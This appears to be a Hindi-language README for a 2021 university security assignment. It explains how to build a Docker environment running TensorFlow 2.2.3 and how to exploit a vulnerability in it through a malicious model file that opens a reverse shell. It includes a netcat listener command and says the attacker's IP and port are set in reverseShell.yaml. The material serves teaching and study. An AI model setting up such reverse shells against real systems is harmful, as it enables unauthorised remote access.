
TP सूचना सुरक्षा UTN FRBA 2021
इस कमजोरी का शोषण करने के लिए, एक डॉकर कंटेनर खड़ा करना आवश्यक है, जिसमें Tensorflow के संस्करण 2.2.3 को चलाने के लिए तैयार वातावरण हो, जिसमें अभी भी यह कमजोरी मौजूद है। इसमें शामिल हैं:
जाँचें कि मशीन पर डॉकर स्थापित है या नहीं:
docker -v
एक बार जब हमारे ऑपरेटिंग सिस्टम में डॉकर इंस्टॉल हो जाए, तो एप्लिकेशन को बनाने और चलाने के लिए इस रिपॉजिटरी की रूट फ़ोल्डर में निम्नलिखित कमांड चलाएँ:
docker-compose build
docker-compose up
या, डॉकर कंपोज़ के बिना चलाने के लिए:
docker build -t docker-exploit-tensorflow-vulnerability:1.0 . # इमेज बनाने के लिए
docker run --add-host=host.docker.internal:host-gateway --name exploit-tensorflow-vulnerability docker-exploit-tensorflow-vulnerability:1.0 # पहली बार प्रक्रिया बनाने और चलाने के लिए
docker start -a exploit-tensorflow-vulnerability # प्रक्रिया को फिर से चलाने के लिए
रिवर्स शेल के काम करने के लिए, हमलावर मशीन पर netcat स्थापित होना चाहिए, और ssh सत्र के लिए एक सुनने वाला पोर्ट खोलना होगा। उदाहरण:
nc -lvp 10000
फिर, एक दुर्भावनापूर्ण AI मॉडल के माध्यम से कमजोरी का शोषण किया जाएगा, जहाँ हम हमलावर के साथ कनेक्शन स्थापित करेंगे। हमलावर की IP और सुनने वाले पोर्ट को reverseShell.yaml फ़ाइल में कॉन्फ़िगर करना होगा।